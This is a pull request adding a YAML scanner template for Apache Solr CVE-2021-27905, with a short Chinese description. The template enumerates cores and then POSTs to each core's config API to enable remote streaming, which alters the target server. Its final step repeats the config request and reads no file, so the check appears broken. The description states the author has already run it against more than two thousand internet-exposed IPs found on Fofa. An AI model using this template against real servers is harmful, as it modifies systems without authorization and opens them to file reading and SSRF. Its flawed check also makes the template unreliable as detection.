### PR TITLE
Create poc-yaml-Solr-LFI-CVE-2021-27905.yml

### DIFF
--- a/pocs/poc-yaml-Solr-LFI-CVE-2021-27905.yml
+++ b/pocs/poc-yaml-Solr-LFI-CVE-2021-27905.yml
@@ -1,0 +1,25 @@
+name: poc-yaml-Solr-LFI-CVE-2021-27905
+rules:
+  - method: GET
+    path: "/solr/admin/cores?indexInfo=false&wt=json"
+    expression: "true"
+    search: |
+      "name":"(?P<name>.+?)"
+  - method: POST
+    path: "/solr/{{name}}/config"
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+    body: |
+      {"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+    expression: |
+      response.status == 200 && response.body.bcontains(b'responseHeader') 
+  - method: POST
+    path: "/solr/{{name}}/debug/dump"
+    headers:
+      Content-Type: application/json
+      Accept: application/json
+    body: |
+      {"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+    expression: |
+      response.status == 200 &&  response.body.bcontains(b'responseHeader')


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的

CVE-2021-27905
Apache Solr 本地文件包含和SSRF

## 测试环境
如果选择自己搭建靶场，下面的链接有搭建教程
https://mp.weixin.qq.com/s/1AYen3qZMhiiym_wJh5lzw

## 备注
Fofa上有两千多个IP存在该漏洞，已经用POC测试过了
![image](https://raw.githubusercontent.com/W2Ning/Solr-SSRF/main/example.png)
